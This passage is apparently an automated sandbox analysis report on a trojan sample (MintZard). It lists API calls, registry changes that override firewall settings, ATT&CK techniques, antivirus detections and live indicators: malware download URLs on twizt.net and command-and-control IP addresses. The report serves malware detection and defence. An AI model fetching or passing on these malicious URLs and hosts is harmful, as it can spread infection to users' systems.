                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,8_2_00406650
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00406510
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeThread delayed: delay time: 30000Jump to behavior
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000920000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPx
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeAPI call chain: ExitProcess graph end nodegraph_3-4368
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeAPI call chain: ExitProcess graph end nodegraph_3-4355
                                Source: C:\Users\user\sysvratrel.exeAPI call chain: ExitProcess graph end nodegraph_5-4927
                                Source: C:\Users\user\sysvratrel.exeAPI call chain: ExitProcess graph end nodegraph_5-4367
                                Source: C:\Users\user\sysvratrel.exeAPI call chain: ExitProcess graph end nodegraph_8-4927
                                Source: C:\Users\user\sysvratrel.exeAPI call chain: ExitProcess graph end nodegraph_8-4367
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeCode function: 0_2_00531BC8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00531BC8
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040A120 GetProcessHeaps,3_2_0040A120
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeCode function: 0_2_00531BC8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00531BC8
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: GetLocaleInfoA,strcmp,3_2_0040E970
                                Source: C:\Users\user\sysvratrel.exeCode function: GetLocaleInfoA,strcmp,5_2_0040E970
                                Source: C:\Users\user\sysvratrel.exeCode function: GetLocaleInfoA,strcmp,8_2_0040E970
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeCode function: 0_2_00531AF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00531AF8

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\sysvratrel.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\sysvratrel.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,3_2_00401470
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,3_2_0040D950
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread,3_2_004013B0
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,5_2_00401470
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,5_2_00402020
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,5_2_0040D950
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread,5_2_004013B0
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,8_2_00401470
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,8_2_00402020
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040D950 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,8_2_0040D950
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_004013B0 CreateEventA,socket,bind,CreateThread,8_2_004013B0
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                                Native API
                                1
                                Windows Service
                                1
                                Windows Service
                                231
                                Masquerading
                                11
                                Input Capture
                                1
                                System Time Discovery
                                Remote Services11
                                Input Capture
                                2
                                Encrypted Channel
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault AccountsScheduled Task/Job1
                                Registry Run Keys / Startup Folder
                                1
                                Process Injection
                                1
                                Disable or Modify Tools
                                LSASS Memory231
                                Security Software Discovery
                                Remote Desktop Protocol1
                                Archive Collected Data
                                1
                                Non-Standard Port
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain AccountsAt1
                                DLL Side-Loading
                                1
                                Registry Run Keys / Startup Folder
                                11
                                Virtualization/Sandbox Evasion
                                Security Account Manager11
                                Virtualization/Sandbox Evasion
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                14
                                Ingress Tool Transfer
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                                DLL Side-Loading
                                1
                                Process Injection
                                NTDS1
                                Application Window Discovery
                                Distributed Component Object ModelInput Capture3
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                                Hidden Files and Directories
                                LSA Secrets1
                                System Network Connections Discovery
                                SSHKeylogging23
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                Obfuscated Files or Information
                                Cached Domain Credentials1
                                File and Directory Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                DLL Side-Loading
                                DCSync14
                                System Information Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430850 Sample: 957C4XK6Lt.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 37 twizt.net 2->37 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 7 other signatures 2->53 8 957C4XK6Lt.exe 16 2->8         started        13 sysvratrel.exe 2->13         started        15 sysvratrel.exe 2->15         started        17 sysvratrel.exe 2->17         started        signatures3 process4 dnsIp5 45 twizt.net 185.215.113.66, 49710, 49713, 49714 WHOLESALECONNECTIONSNL Portugal 8->45 33 C:\Users\user\AppData\Local\...\135143440.exe, PE32 8->33 dropped 35 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 8->35 dropped 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 8->69 19 135143440.exe 9 20 8->19         started        71 Antivirus detection for dropped file 13->71 73 Multi AV Scanner detection for dropped file 13->73 75 Found evasive API chain (may stop execution after checking mutex) 13->75 77 3 other signatures 13->77 file6 signatures7 process8 dnsIp9 39 189.158.148.85, 40500 UninetSAdeCVMX Mexico 19->39 41 197.148.34.173, 40500 TVCaboAngolaAO Angola 19->41 43 57 other IPs or domains 19->43 27 C:\Windows\sysvratrel.exe, PE32 19->27 dropped 29 C:\Users\user\sysvratrel.exe, PE32 19->29 dropped 31 C:\Users\user\AppData\...\1682018248.exe, PE32 19->31 dropped 55 Antivirus detection for dropped file 19->55 57 Multi AV Scanner detection for dropped file 19->57 59 Found evasive API chain (may stop execution after checking mutex) 19->59 61 7 other signatures 19->61 24 1682018248.exe 19->24         started        file10 signatures11 process12 signatures13 63 Antivirus detection for dropped file 24->63 65 Multi AV Scanner detection for dropped file 24->65 67 Machine Learning detection for dropped file 24->67

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                957C4XK6Lt.exe68%ReversingLabsWin32.Trojan.MintZard
                                957C4XK6Lt.exe56%VirustotalBrowse
                                957C4XK6Lt.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\135143440.exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\sysvratrel.exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\AppData\Local\Temp\1682018248.exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\sysvratrel.exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe100%AviraHEUR/AGEN.1315882
                                C:\Users\user\AppData\Local\Temp\135143440.exe100%Joe Sandbox ML
                                C:\Users\user\sysvratrel.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1682018248.exe100%Joe Sandbox ML
                                C:\Users\user\sysvratrel.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe65%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\AppData\Local\Temp\135143440.exe65%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\AppData\Local\Temp\1682018248.exe79%ReversingLabsWin32.Trojan.MintZard
                                C:\Users\user\sysvratrel.exe65%ReversingLabsWin32.Trojan.MintZard
                                C:\Windows\sysvratrel.exe65%ReversingLabsWin32.Trojan.MintZard
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                twizt.net22%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                http://91.202.233.141/0%Avira URL Cloudsafe
                                http://91.202.233.141/10%Avira URL Cloudsafe
                                http://twizt.net/pei100%Avira URL Cloudmalware
                                http://twizt.net/new100%Avira URL Cloudmalware
                                http://185.215.113.66/1D100%Avira URL Cloudmalware
                                http://193.233.132.177/5h.dllm0%Avira URL Cloudsafe
                                http://91.202.233.141/20%Avira URL Cloudsafe
                                http://91.202.233.141/9%VirustotalBrowse
                                http://193.233.132.177/5z0%Avira URL Cloudsafe
                                http://twizt.net/pei14%VirustotalBrowse
                                http://91.202.233.141/4l30%Avira URL Cloudsafe
                                http://91.202.233.141/24%VirustotalBrowse
                                http://193.233.132.177/6b0%Avira URL Cloudsafe
                                http://91.202.233.141/13%VirustotalBrowse
                                http://twizt.net/new14%VirustotalBrowse
                                http://185.215.113.66/383(100%Avira URL Cloudmalware
                                http://193.233.132.177/3B0%Avira URL Cloudsafe
                                http://91.202.233.141/50%Avira URL Cloudsafe
                                http://91.202.233.141/60%Avira URL Cloudsafe
                                http://185.215.113.66/1D18%VirustotalBrowse
                                http://91.202.233.141/30%Avira URL Cloudsafe
                                http://91.202.233.141/40%Avira URL Cloudsafe
                                http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user100%Avira URL Cloudmalware
                                http://91.202.233.141/2s0%Avira URL Cloudsafe
                                http://twizt.net/peinstall.php5%z100%Avira URL Cloudmalware
                                http://91.202.233.141/55%VirustotalBrowse
                                http://twizt.net/newtpp.z%100%Avira URL Cloudmalware
                                http://91.202.233.141/65%VirustotalBrowse
                                http://193.233.132.177/5R0%Avira URL Cloudsafe
                                http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user16%VirustotalBrowse
                                http://91.202.233.141/1p30%Avira URL Cloudsafe
                                http://91.202.233.141/31%VirustotalBrowse
                                http://185.215.113.66/100%Avira URL Cloudmalware
                                http://91.202.233.141/45%VirustotalBrowse
                                http://91.202.233.141/400%Avira URL Cloudsafe
                                http://twizt.net/peinstall.phpb100%Avira URL Cloudmalware
                                http://91.202.233.141/4%0%Avira URL Cloudsafe
                                http://193.233.132.177/1Z0%Avira URL Cloudsafe
                                http://91.202.233.141/6L20%Avira URL Cloudsafe
                                http://twizt.net/peinstall.phpshqos.dll.muiS9100%Avira URL Cloudmalware
                                http://91.200%Avira URL Cloudsafe
                                http://twizt.net/newtpp.exeP0S100%Avira URL Cloudmalware
                                http://91.202.233.141/3rosoft0%Avira URL Cloudsafe
                                http://twizt.net/peinstall.phpb14%VirustotalBrowse
                                http://185.215.113.66/1~100%Avira URL Cloudmalware
                                http://twizt.net/peinstall.phpm%100%Avira URL Cloudmalware
                                http://193.233.132.177/0%Avira URL Cloudsafe
                                http://91.200%VirustotalBrowse
                                http://185.215.113.66/5100%Avira URL Cloudmalware
                                http://185.215.113.66/4100%Avira URL Cloudmalware
                                http://185.215.113.66/1~16%VirustotalBrowse
                                http://185.215.113.66/17%VirustotalBrowse
                                http://185.215.113.66/3100%Avira URL Cloudmalware
                                http://185.215.113.66/2100%Avira URL Cloudmalware
                                http://193.233.132.177/60%Avira URL Cloudsafe
                                http://91.202.233.141/2W3C0%Avira URL Cloudsafe
                                http://185.215.113.66/518%VirustotalBrowse
                                http://193.233.132.177/50%Avira URL Cloudsafe
                                http://185.215.113.66/418%VirustotalBrowse
                                http://193.233.132.177/8%VirustotalBrowse
                                http://193.233.132.177/20%Avira URL Cloudsafe
                                http://185.215.113.66/6100%Avira URL Cloudmalware
                                http://185.215.113.66/318%VirustotalBrowse
                                http://193.233.132.177/10%Avira URL Cloudsafe
                                http://185.215.113.66/218%VirustotalBrowse
                                http://193.233.132.177/40%Avira URL Cloudsafe
                                http://91.202.233.141/4z0%Avira URL Cloudsafe
                                http://193.233.132.177/30%Avira URL Cloudsafe
                                http://185.215.113.66/1100%Avira URL Cloudmalware
                                http://twizt.net/peinstall.php%temp%%s100%Avira URL Cloudmalware
                                http://91.202.233.141/5O0%Avira URL Cloudsafe
                                http://193.233.132.177/61%VirustotalBrowse
                                http://91.202.233.141/6ZF0%Avira URL Cloudsafe
                                http://193.233.132.177/5h.dll0%Avira URL Cloudsafe
                                http://91.202.233.141/6-30%Avira URL Cloudsafe
                                http://twizt.net/newtpp.exeP0100%Avira URL Cloudmalware
                                http://twizt.net/peinstall.phpystem32100%Avira URL Cloudmalware
                                http://twizt.net/=100%Avira URL Cloudmalware
                                http://twizt.net/newtpp.exe100%Avira URL Cloudmalware
                                http://twizt.net/peinstall.php100%Avira URL Cloudmalware
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                twizt.net
                                185.215.113.66
                                truefalseunknown
                                NameMaliciousAntivirus DetectionReputation
                                http://185.215.113.66/5false
                                • 18%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/4false
                                • 18%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/3false
                                • 18%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/2false
                                • 18%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/6false
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/1false
                                • Avira URL Cloud: malware
                                unknown
                                http://twizt.net/newtpp.exefalse
                                • Avira URL Cloud: malware
                                unknown
                                http://twizt.net/peinstall.phpfalse
                                • Avira URL Cloud: malware
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://twizt.net/pei957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008BE000.00000004.00000020.00020000.00000000.sdmptrue
                                • 14%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://twizt.net/new957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmptrue
                                • 14%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://91.202.233.141/135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.drfalse
                                • 9%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.66/1D135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmptrue
                                • 18%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                http://schemas.xmlsoap.org/soap/envelope/newtpp[1].exe.0.drfalse
                                  high
                                  http://91.202.233.141/1135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 3%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://193.233.132.177/5h.dllm135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://91.202.233.141/2135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://193.233.132.177/5z135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://91.202.233.141/4l3135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://193.233.132.177/6b135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.66/383(135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://193.233.132.177/3B135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://91.202.233.141/5135143440.exe, 00000003.00000002.4536101356.00000000024AB000.00000004.00000010.00020000.00000000.sdmpfalse
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://91.202.233.141/6135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://91.202.233.141/3135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://91.202.233.141/4135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.drfalse
                                  • 16%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://91.202.233.141/2s135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://twizt.net/peinstall.php5%z957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://twizt.net/newtpp.z%957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://193.233.132.177/5R135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://91.202.233.141/1p3135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
